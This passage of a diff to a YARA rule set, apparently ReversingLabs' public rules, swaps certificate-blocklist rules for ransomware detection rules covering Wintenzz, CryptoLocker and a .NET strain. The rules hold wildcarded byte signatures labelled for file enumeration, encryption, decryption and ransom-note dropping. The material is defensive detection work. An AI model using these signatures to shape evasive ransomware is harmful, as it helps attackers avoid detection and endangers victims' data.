+            1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 03 0B 07 18 73 ?? ?? ?? ?? 0C 73
+            ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 04 06
+            20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 19 6F ??
+            ?? ?? ?? 09 17 6F ?? ?? ?? ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ??
+            ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? D2 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 25 13 ?? 15 33
+            ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 02 28 ?? ?? ?? ?? DE ??
+            13 ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 2A
+        }
+		$find_files = {
+            16 0A 38 ?? ?? ?? ?? 16 0B 2B ?? 02 06 9A 28 ?? ?? ?? ?? 2C ?? 02 06 9A 73 ?? ?? ?? ??
+            0C 08 72 ?? ?? ?? ?? 03 07 9A 28 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 0D 09 13 ?? 16 13 ?? 2B
+            ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 05 28 ?? ?? ?? ?? 1E
+            8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ??
+            11 ?? 8E 69 32 ?? 07 17 58 0B 07 03 8E 69 32 ?? 06 17 58 0A 06 02 8E 69 3F ?? ?? ?? ??
+            2A
+        }
+		$collect_env_and_start_enc_proc = {
+            19 8D ?? ?? ?? ?? 0B 07 16 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 07 17 1B
+            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 07 18 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? A2 07 1F ?? 8D ?? ?? ?? ?? 0C 08 16 72 ?? ?? ?? ?? A2 08 17 72 ?? ??
+            ?? ?? A2 08 18 72 ?? ?? ?? ?? A2 08 19 72 ?? ?? ?? ?? A2 08 1A 72 ?? ?? ?? ?? A2 08 1B
+            72 ?? ?? ?? ?? A2 08 1C 72 ?? ?? ?? ?? A2 08 1D 72 ?? ?? ?? ?? A2 08 1E 72 ?? ?? ?? ??
+            A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08
+            1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ??
+            72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ??
+            ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ??
+            ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 72 ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A
+            06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 72 ?? ?? ?? ?? 16
+            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FIRNEEZ EUROPE LIMITED" and ( pe.signatures [ i ] . serial == "00:b1:da:21:96:88:e5:1f:d0:bf:ac:2c:89:1d:56:cb:b8" or pe.signatures [ i ] . serial == "b1:da:21:96:88:e5:1f:d0:bf:ac:2c:89:1d:56:cb:b8" ) and 1542931200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $collect_env_and_start_enc_proc ) and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_7289B0F9Bd641E3E352Dc3183F8De6Be : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Wintenzz : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Wintenzz ransomware."
 		author = "ReversingLabs"
-		id = "dc8a745f-7150-57b7-9ddc-e5a1721d8c02"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "6bf569e8-b050-51ef-a948-0eb294248d63"
+		date = "2021-11-02"
+		modified = "2021-11-02"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3082-L3098"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "42b068e85b3aff5e6dd5ec4979f546dc5338ebf8719d86c0641ffb8353959af9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win64.Ransomware.Wintenzz.yara#L1-L83"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ff4bdf2f6ee185b98d0014b3066806fe7e25ea94f46837948bc5262440bf8a56"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Wintenzz"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            48 8D 75 ?? 41 B8 ?? ?? ?? ?? 48 89 F1 31 D2 E8 ?? ?? ?? ?? 48 89 F9 48 89 F2 E8 ??
+            ?? ?? ?? 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 89 C6 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ??
+            ?? ?? 0F 28 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 11 00 0F 28 85 ?? ?? ??
+            ?? 0F 11 40 ?? 48 8B 8D ?? ?? ?? ?? 48 89 48 ?? 49 89 77 ?? 49 89 47 ?? 41 C7 47 ??
+            ?? ?? ?? ?? 49 8D 4F ?? 48 8D 55 ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 B6 ?? 31 C0
+            49 89 07 48 85 DB 75 ?? EB ?? E8 ?? ?? ?? ?? 48 C1 E0 ?? 49 89 47 ?? 49 C7 47 ?? ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 31 F6 49 89 07 48 85 DB 74 ?? 48 01 DB 74 ?? 41 B8 ?? ?? ??
+            ?? 48 89 F9 48 89 DA E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 41 B8 ?? ??
+            ?? ?? 4C 89 F1 E8 ?? ?? ?? ?? 40 84 F6 75 ?? 48 8B 8D ?? ?? ?? ?? 48 85 C9 74 ?? 48
+            8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 F8 48 81 C4
+            ?? ?? ?? ?? 5B 5F 5E 41 5E 41 5F 5D C3 BA
+        }
+		$encrypt_files_p1 = {
+            4C 89 75 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D
+            05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 C7 45 ?? ?? ?? ?? ??
+            48 C7 45 ?? ?? ?? ?? ?? 48 89 7D ?? 48 C7 45 ?? ?? ?? ?? ?? 48 8D 4D ?? 48 8D 55 ??
+            E8 ?? ?? ?? ?? 0F 10 45 ?? 0F 29 45 ?? 48 8B 45 ?? 48 89 45 ?? 48 8D 4D ?? 48 8D 55
+            ?? E8 ?? ?? ?? ?? 48 85 DB 74 ?? BA ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 85 C0 75
+            ?? BA ?? ?? ?? ?? 48 89 D9 E8
+        }
+		$encrypt_files_p2 = {
+            86 97 ?? ?? ?? ?? C0 74 3C ?? ?? C1 E8 ?? 28 03 00 48 ?? C0 74 2F ?? ?? FA 03 75 ??
+            48 8D 0D ?? ?? ?? ?? 48 39 C8 0F 84 ?? ?? ?? ?? 0F B7 08 81 F1 ?? ?? ?? ?? 0F B6 40
+            ?? 83 F0 ?? 66 09 C8 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ?? ?? 48 85
+            C0 74 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 FA ?? 75 ?? 48 8D 0D ?? ?? ??
+            ?? 48 39 C8 0F 84 ?? ?? ?? ?? 81 38 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8B
+            55 ?? E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 FA
+            ?? 75 ?? 48 8D 0D ?? ?? ?? ?? 48 39 C8 0F 84 ?? ?? ?? ?? 0F B7 08 81 F1 ?? ?? ?? ??
+            0F B6 40 ?? 83 F0 ?? 66 09 C8 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ??
+            ?? 48 85 C0 74 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 FA ?? 75 ?? 48 8D 0D
+            ?? ?? ?? ?? 48 39 C8 0F 84 ?? ?? ?? ?? 0F B7 08 81 F1 ?? ?? ?? ?? 0F B6 40 ?? 83 F0
+            ?? 66 09 C8 0F 84 ?? ?? ?? ?? 48 8B 4D
+        }
+		$drop_ransom_note = {
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 48 8B 8D ?? ??
+            ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 48 8B 8D
+            ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 48
+            8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74
+            ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85
+            D2 74 ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ??
+            48 85 D2 74 ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ??
+            ?? ?? 48 85 D2 74 ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 84 F6
+            0F 85 ?? ?? ?? ?? 48 8B 55 ?? 48 85 D2 74 ?? 41 B8 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8B 55 ?? 48 85 D2 74 ?? 41 B8 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 48 8B 55
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ICE ACTIVATION LIMITED" and pe.signatures [ i ] . serial == "72:89:b0:f9:bd:64:1e:3e:35:2d:c3:18:3f:8d:e6:be" and 1557933274 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_* ) ) and ( $drop_ransom_note )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Fd7B7A8678A67181A54Bc7499Eba44Da : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Cryptolocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects CryptoLocker ransomware."
 		author = "ReversingLabs"
-		id = "d6456cb6-e950-54be-a7f4-5c1d622c6aab"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "8cc3ac4b-9179-5e2c-97e1-65304f9dfe22"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3100-L3118"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f1e26ea26890043be2c8b9c35ba2e6758b60fe173f00bf4c77cc5289ce0d5600"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.CryptoLocker.yara#L3-L154"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "08430b0c5689840d592bdda5dbc2ed06e0d0fa1e2c0f19aff4316580c6a0b23d"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "CryptoLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$file_loop_1 = {
+            55 8B EC 83 EC ?? 53 56 8B D9 57 89 5D ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 32 C9 83 7D ?? ?? 88 4D ?? 0F 86 45 01
+            00 00 8B 5D ?? 0F 57 C0 66 0F 13 45 ?? 84 C9 74 08 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 33 FF 15 ??
+            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 75 ??
+            6A ?? 8B 49 ?? 6A ?? 52 56 8B 01 6A ?? 89 55 ?? 8B 00 FF D0 84 C0 0F 84 E6 00 00 00 FF 15 ?? ?? ?? ?? 8B 7D ?? 33 D2 89
+            45 ?? 8B D8 85 FF 72 18 77 08 81 FE ?? ?? ?? ?? 76 0E B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB 05 8B C6 89 7D ?? 3B D0 73
+            0F 8B 45 ?? 8D 0C 13 8B 40 ?? 88 0C 02 42 EB CC 8B 5D ?? 85 FF 8B FE 75 04 85 F6 74 6B 85 DB 77 0E 72 08 81 FF ?? ?? ??
+            ?? 73 04 8B F7 EB 05 BE ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 56 FF 70 ?? 8B 45 ?? FF 30 FF 15 ?? ?? ?? ?? 85 C0 74 ??
+            39 75 ?? 75 ?? 8B 45 ?? 2B FE 8B 55 ?? 83 DB ?? 2B D7 8B 48 ?? 8B 45 ?? 1B C3 50 8B 31 52 FF 75 ?? FF 75 ?? 8B 06 6A ??
+            FF D0 84 C0 74 34 85 DB 77 AD 72 04 85 FF 75 95 8B 5D ?? FF 33 FF 15 ?? ?? ?? ?? 8A 4D ?? FE C1 0F B6 C1 88 4D ?? 3B 45
+            ?? 0F 82 C6 FE FF FF B0 ?? 5F 5E 5B 8B E5 5D C2
+        }
+		$file_loop_2 = {
+            55 8B EC 83 EC ?? 53 56 8B D9 57 89 5D ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 32 C9 83 7D ?? ?? 88 4D ?? 0F 86 50 01
+            00 00 8B 5D ?? 0F 57 C0 66 0F 13 45 ?? 84 C9 74 08 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 33 FF 15 ??
+            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 49 ??
+            8B 75 ?? 8B 01 6A ?? 8B 00 6A ?? 52 56 6A ?? 89 55 ?? FF D0 84 C0 0F 84 F1 00 00 00 FF 15 ?? ?? ?? ?? 8B 7D ?? 89 45 ??
+            33 D2 8B D8 85 FF 72 18 77 08 81 FE ?? ?? ?? ?? 76 0E B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB 05 8B C6 89 7D ?? 3B D0 73
+            10 8B 45 ?? 8D 0C 13 8B 40 ?? 42 88 4C 02 ?? EB CB 8B 5D ?? 85 FF 8B FE 75 04 85 F6 74 75 85 DB 77 11 72 08 81 FF ?? ??
+            ?? ?? 73 07 8B F7 89 5D ?? EB 0C BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 56 FF 70 ?? 8B 45 ?? FF
+            30 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 39 75 ?? 75 ?? 8B 45 ?? 8B 55 ?? 8B 48 ?? 8B 45 ?? 2B FE 8B 31 83 DB ?? 2B D7 1B C3 50
+            8B 06 52 FF 75 ?? FF 75 ?? 6A ?? FF D0 84 C0 74 34 85 DB 77 A6 72 04 85 FF 75 8B 8B 5D ?? FF 33 FF 15 ?? ?? ?? ?? 8A 4D
+            ?? FE C1 0F B6 C1 88 4D ?? 3B 45 ?? 0F 82 BB FE FF FF B0 ?? 5F 5E 5B 8B E5 5D C2
+        }
+		$file_loop_3 = {
+            55 8B EC 83 EC ?? 53 56 8B C1 57 89 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 62 01 00 00 8B 5D ?? 32 C0 0F 57 C0 88 45 ?? 66 0F
+            13 45 ?? EB 03 8D 49 ?? 84 C0 74 08 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 33 FF 15 ?? ?? ?? ?? 85 C0
+            0F 84 27 01 00 00 8D 45 ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 0F 84 13 01 00 00 8B 4D ?? 8B 55 ?? 8B 49 ?? 8B 75 ?? 8B 01
+            6A ?? 8B 00 6A ?? 52 56 6A ?? 89 55 ?? FF D0 84 C0 0F 84 EE 00 00 00 FF 15 ?? ?? ?? ?? 8B 7D ?? 89 45 ?? 33 D2 8B D8 90
+            85 FF 72 18 77 08 81 FE ?? ?? ?? ?? 76 0E B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB 05 8B C6 89 7D ?? 3B D0 73 10 8B 45 ??
+            8D 0C 13 8B 40 ?? 42 88 4C 02 ?? EB CB 8B 5D ?? 85 FF 8B FE 75 04 85 F6 74 75 85 DB 77 11 72 08 81 FF ?? ?? ?? ?? 73 07
+            8B F7 89 5D ?? EB 0C BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 56 FF 70 ?? 8B 45 ?? FF 30 FF 15 ??
+            ?? ?? ?? 85 C0 74 5E 39 75 ?? 75 59 8B 45 ?? 8B 55 ?? 8B 48 ?? 8B 45 ?? 2B FE 8B 31 83 DB ?? 2B D7 1B C3 50 8B 06 52 FF
+            75 ?? FF 75 ?? 6A ?? FF D0 84 C0 74 30 85 DB 77 A6 72 04 85 FF 75 8B 8B 5D ?? FF 33 FF 15 ?? ?? ?? ?? 8A 45 ?? FE C0 88
+            45 ?? 3C ?? 0F 82 BE FE FF FF B0 ?? 5F 5E 5B 8B E5 5D C2
+        }
+		$encrypt_data_1 = {
+            55 8B EC 56 8B 75 ?? 57 8B F9 39 75 ?? 73 09 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B 07 53 85 C0 74 58 48 83 F8 ?? 77 48 8B 5D ??
+            8B 45 ?? 3B D8 74 0B 56 50 53 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 8D 45 ?? 89 75 ?? 50 8B 45 ?? 53 6A ?? 0F B6 C0 50 6A ??
+            FF 77 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA ?? 85 C0 5B 0F 44 CA 5F 8B C1 5E 5D C2 ?? ?? 5B 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B
+            47 ?? 33 D2 89 45 ?? 8B 47 ?? 85 F6 74 26 8B 7D ?? 8B DE 8B 4D ?? 8B F0 2B F9 8A 04 0F 8D 49 ?? 32 04 32 88 41 ?? 8D 42
+            ?? 33 D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5B 5F 8B C6 5E 5D C2
+        }
+		$encrypt_data_2 = {
+            55 8B EC 56 8B 75 ?? 57 8B F9 39 75 ?? 73 09 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B 07 53 85 C0 74 56 48 83 F8 ?? 77 46 8B 5D ??
+            8B 45 ?? 3B D8 74 0B 56 50 53 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 8D 45 ?? 50 0F B6 45 ?? 53 6A ?? 50 6A ?? FF 77 ?? 89 75
+            ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA ?? 85 C0 5B 0F 44 CA 5F 8B C1 5E 5D C2 ?? ?? 5B 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B 47 ??
+            33 D2 89 45 ?? 8B 47 ?? 85 F6 74 26 8B 4D ?? 8B 7D ?? 8B DE 2B F9 8B F0 8A 04 0F 32 04 32 8D 49 ?? 88 41 ?? 8D 42 ?? 33
+            D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5B 5F 8B C6 5E 5D C2
+        }
+		$encrypt_data_3 = {
+            55 8B EC 53 56 8B 75 ?? 8B D9 39 75 ?? 72 4C 83 3B ?? 77 47 8B 45 ?? 57 8B 7D ?? 3B F8 74 0B 56 50 57 E8 ?? ?? ?? ?? 83
+            C4 ?? FF 75 ?? 8D 45 ?? 50 0F B6 45 ?? 57 6A ?? 50 6A ?? FF 73 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA ?? 85 C0 5F
+            0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 5E 83 C8 ?? 5B 5D C2
+        }
+		$decrypt_data_1 = {
+            55 8B EC 53 56 57 8B F9 8B 07 85 C0 74 53 48 83 F8 ?? 77 55 8B 75 ?? 39 75 ?? 72 4D 8B 5D ?? 8B 45 ?? 3B D8 74 0B 56 50
+            53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 89 75 ?? 50 8B 45 ?? 53 6A ?? 0F B6 C0 50 6A ?? FF 77 ?? FF 15 ?? ?? ?? ?? 8B 4D ??
+            83 CA ?? 85 C0 5F 0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 8B 75 ?? 39 75 ?? 73 0A 5F 5E 83 C8 ?? 5B 5D C2 ?? ?? 8B 47 ?? 33 D2
+            89 45 ?? 8B 47 ?? 85 F6 74 28 8B 7D ?? 8B DE 8B 4D ?? 8B F0 2B F9 8B FF 8A 04 0F 8D 49 ?? 32 04 32 88 41 ?? 8D 42 ?? 33
+            D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5F 8B C6 5E 5B 5D C2
+        }
+		$decrypt_data_2 = {
+            55 8B EC 53 56 57 8B F9 8B 07 85 C0 74 51 48 83 F8 ?? 77 53 8B 75 ?? 39 75 ?? 72 4B 8B 5D ?? 8B 45 ?? 3B D8 74 0B 56 50
+            53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 0F B6 45 ?? 53 6A ?? 50 6A ?? FF 77 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA
+            ?? 85 C0 5F 0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 8B 75 ?? 39 75 ?? 73 0A 5F 5E 83 C8 ?? 5B 5D C2 ?? ?? 8B 47 ?? 33 D2 89 45
+            ?? 8B 47 ?? 85 F6 74 2A 8B 4D ?? 8B 7D ?? 8B DE 2B F9 8B F0 8D 64 24 ?? 8A 04 0F 32 04 32 8D 49 ?? 88 41 ?? 8D 42 ?? 33
+            D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5F 8B C6 5E 5B 5D C2
+        }
+		$decrypt_data_3 = {
+            55 8B EC 53 8B D9 83 3B ?? 77 56 56 8B 75 ?? 39 75 ?? 73 09 5E 83 C8 ?? 5B 5D C2 ?? ?? 8B 45 ?? 57 8B 7D ?? 3B F8 74 0B
+            56 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 0F B6 45 ?? 57 6A ?? 50 6A ?? FF 73 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ??
+            83 CA ?? 85 C0 5F 0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 83 C8 ?? 5B 5D C2
+        }
+		$decrypt_strings_1 = {
+            55 8B EC 53 56 8B D9 8B F2 57 33 C9 33 FF 2B DE 8B 45 ?? 8D 14 31 8A 04 07 02 C1 32 04 13 88 02 8D 47 ?? 33 D2 F7 75 ??
+            8B FA F6 C1 ?? 75 0B 8B C1 D1 E8 66 83 3C 46 ?? 74 03 41 EB D3 D1 E9 5F 5E 5B 8D 41 ?? 5D C3
+        }
+		$decrypt_strings_2 = {
+            55 8B EC 53 56 8B D9 57 8B F2 33 C9 33 FF 2B DE 8B 45 ?? 8D 14 31 8A 04 07 02 C1 32 04 13 88 02 8D 47 ?? 33 D2 F7 75 ??
+            8B FA F6 C1 ?? 75 0B 8B C1 D1 E8 66 83 3C 46 ?? 74 03 41 EB D3 5F D1 E9 5E 8D 41 ?? 5B 5D C3
+        }
+		$decrypt_1 = {
+            A1 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8C B7 00 00 00 33 D2 8B 0C 95 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 81 E1 ?? ?? ?? ?? 33 0C
+            95 ?? ?? ?? ?? 8B C1 D1 E9 83 E0 ?? 33 0C 85 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 89 0C 95 ?? ?? ?? ?? 42 81 FA ?? ?? ?? ??
+            7C C0 81 FA ?? ?? ?? ?? 7D 39 56 8D 34 95 ?? ?? ?? ?? 8B 0E 33 4E ?? 81 E1 ?? ?? ?? ?? 33 0E 8B C1 D1 E9 83 E0 ?? 8B 04
+            85 ?? ?? ?? ?? 33 86 ?? ?? ?? ?? 33 C1 89 06 83 C6 ?? 81 FE ?? ?? ?? ?? 7C D0 5E 8B 0D ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 81
+            E1 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 8B C1 D1 E9 83 E0 ?? 33 0C 85 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 33 C0 89 0D ?? ?? ?? ?? 8B
+            0C 85 ?? ?? ?? ?? 40 A3 ?? ?? ?? ?? 8B C1 C1 E8 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0
+            ?? 33 C8 8B C1 C1 E8 ?? 33 C1 C3
+        }
+		$decrypt_2 = {
+            A1 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8C C7 00 00 00 33 D2 EB 0C 8D A4 24 ?? ?? ?? ?? EB 03 8D 49 ?? 8B 0C 95 ?? ?? ?? ?? 33
+            0C 95 ?? ?? ?? ?? 42 81 E1 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ?? ?? 33 0C 95 ?? ?? ??
